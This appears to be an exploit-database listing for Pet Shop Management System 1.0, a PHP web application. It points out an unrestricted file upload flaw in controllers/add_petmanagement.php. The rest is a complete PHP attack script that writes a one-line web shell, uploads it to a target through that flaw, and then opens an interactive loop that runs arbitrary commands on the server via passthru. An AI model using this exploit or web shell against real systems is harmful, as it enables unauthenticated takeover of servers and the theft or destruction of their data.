Pet shop management system 1.0 remote code execution (rce) (unauthenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-09-29 | Type : webapps | Platform : php


[+] Code ...

# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Author: Mr.Gedik
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
# Version: 1.0
# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB


Vulnerable code controllers/add_petmanagement.php
Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],
$_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .
addslashes($_FILES["images"]["name"]));

Exploit
#############

<?php
/*
@author:mrgedik
*/
function anim($msg, $time)
{
$msg = str_split($msg);
foreach ($msg as $ms) {
echo $ms;
usleep($time);
}
}

anim("__ __ _____ _ _ _
| \/ | / ____| | (_) |
| \ / |_ __| | __ ___ __| |_| | __
| |\/| | '__| | |_ |/ _ \/ _` | | |/ /
| | | | |_ | |__| | __/ (_| | | <
|_| |_|_(_) \_____|\___|\__,_|_|_|\_\
", 900);

echo PHP_EOL;
while(1)
{
echo anim("Target (http://example.com/path/): ", 800);
$target = trim(fgets(STDIN));
echo PHP_EOL;
if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
echo "Not a valid URL".PHP_EOL;
}else {
break;
}
}
@unlink("exp.php");
$fw = fopen("exp.php","a+");
fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');
fclose($fw);

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
$fields = [
'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
];
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);


$response = curl_exec($ch);
@unlink("exp.php");

if(strstr($response,"success"))
{
while(1)
{
echo anim("root@pwn: ", 800);
$command = trim(fgets(STDIN));
if($command == trim("exit"))
{
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
echo curl_exec($ch);
curl_close ($ch);
}
}else
{
echo anim("Fail", 800);
}


?>